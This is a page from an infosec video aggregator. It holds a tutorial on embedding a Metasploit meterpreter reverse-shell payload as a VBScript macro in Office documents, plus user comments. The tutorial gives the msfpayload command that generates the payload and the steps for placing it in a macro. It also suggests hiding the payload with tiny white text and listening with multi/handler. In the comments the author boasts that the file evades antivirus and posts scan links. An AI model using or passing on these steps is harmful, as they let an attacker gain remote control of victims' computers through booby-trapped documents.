Description: Hello guys today I taught of making a small tutorial on using metasploit payloads as macros and use them effectively inside word, excel, access documents. So as you know creating a normal metasploit backdoor executable using msfpayload, just give the ‘V’ options which msfpayload will generate the payload in VBScript. In this case I will use a reverse connection because I love it :)
msfpayload windows/meterpreter/reverse_tcp LHOST= [Your local Host] LPORT= [Your Local Port] V > Shell.txt
Well now you should create a new word file and go to view > macors and type a random name and create a new macro. Next open up our VBScript which is shell.txt and copy the top part in the file into the Visual Basic editor and save it. Top part in the sense which gives the required functions to execute our payload. After that copy the payload part into our document and you may make the size small and make the color change into white to make non suspicious. Use multi/handler which handles exploits outside the framework to listen. So that’s it now if correctly configured everything you should get a nice reverse connection back to you once the file is opened . Also we can convert any executable to VBS using exe2vbs.rb located at /pentest/exploits/framework/tools/.You can imagine beyond the scope how we can infect and I think more ideas may have occurred inside you ;) .I hope you learnt something.
Thank You.
Email: unownsec[at]gmail[dot]com
Follow @UnownSec
Un0wn_X
Tags: Macros , VBScript , Metasploit ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.
Nicely done! Given this technique has been around, do AVs or MS Security Essentials detect it? Did you try running in presence of AV?
Good Job..!
Nice Video !
Have you tested this file against Avs ?
@SecurityTube_BOT yes the file is fud indeed ... I will test this against AVs while in execution today and let u know guys...
Thanks for the comments
@Alone yes the file is FUD http://vscan.novirusthanks.org/analysis/f77e8bc3995c547e531b0f6c7c399f4e/aS1sb3ZlLXlhLXNvLW11Y2gtZG9jeA==/
http://virusscan.jotti.org/en/scanresult/5a0d41d57fe90f1cf132c46202a0ef07a6beeeed
http://r.virscan.org/report/1288deb25d2e06ff2f43cd968ff8bf5e.html